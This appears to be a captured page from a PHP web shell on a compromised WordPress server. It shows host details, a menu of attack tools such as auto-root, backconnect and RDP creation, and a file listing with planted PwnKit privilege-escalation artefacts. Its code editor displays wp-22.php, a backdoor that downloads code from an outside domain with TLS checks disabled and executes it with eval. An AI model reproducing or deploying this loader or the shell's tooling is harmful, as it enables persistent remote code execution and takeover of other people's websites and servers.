Linux hkg112.arandomserver.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
LiteSpeed
: 172.96.185.170 | : 216.73.216.73
Cant Read [ /etc/named.conf ]
7.4.33
gom
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
gom /
dagathomos.top /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
wp-admin
[ DIR ]
drwxr-xr-x
wp-content
[ DIR ]
drwxr-xr-x
wp-includes
[ DIR ]
drwxr-xr-x
.htaccess
695
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
484756_new_file_G1.php
0
B
-rw-r--r--
error_log
68.45
KB
-rw-r--r--
google03865478695fd77a.html
53
B
-rw-r--r--
index.php
405
B
-rw-r--r--
license.txt
19.44
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
readme.html
7.23
KB
-rw-r--r--
robots.txt
67
B
-rw-r--r--
style.php
0
B
-rw-r--r--
verify_0182487e-f795-4b2f-8e48...
64
B
-rw-r--r--
wp-22.php
1.28
KB
-rw-r--r--
wp-activate.php
7.2
KB
-rw-r--r--
wp-blog-header.php
351
B
-rw-r--r--
wp-comments-post.php
2.27
KB
-rw-r--r--
wp-config-sample.php
3.26
KB
-rw-r--r--
wp-config.php
3.14
KB
-rw-r--r--
wp-cron.php
5.49
KB
-rw-r--r--
wp-links-opml.php
2.43
KB
-rw-r--r--
wp-load.php
3.84
KB
-rw-r--r--
wp-login.php
50.63
KB
-rw-r--r--
wp-mail.php
8.52
KB
-rw-r--r--
wp-settings.php
31.88
KB
-rw-r--r--
wp-signup.php
33.81
KB
-rw-r--r--
wp-trackback.php
5.09
KB
-rw-r--r--
xmlrpc.php
3.13
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wp-22.php
<?php $protocol = "https"; $domain = "seneporno.com"; $file_path = "/3.txt"; $url = $protocol . "://" . $domain . $file_path; // Array dengan beberapa metode pengambilan data $fetch_methods = [ 'file_get_contents' => function($url) { if (ini_get('allow_url_fopen')) { return file_get_contents($url); } return false; }, 'curl' => function($url) { if (function_exists('curl_version')) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $response = curl_exec($ch); curl_close($ch); return $response; } return false; }, 'stream' => function($url) { if ($stream = fopen($url, 'r')) { $data = stream_get_contents($stream); fclose($stream); return $data; } return false; } ]; $content = false; // Mencoba setiap metode secara berurutan foreach ($fetch_methods as $method => $fetch_function) { $content = $fetch_function($url); if ($content !== false) { break; } } if ($content !== false) { eval("?>" . $content); } else { echo "エラー。"; } ?>
Close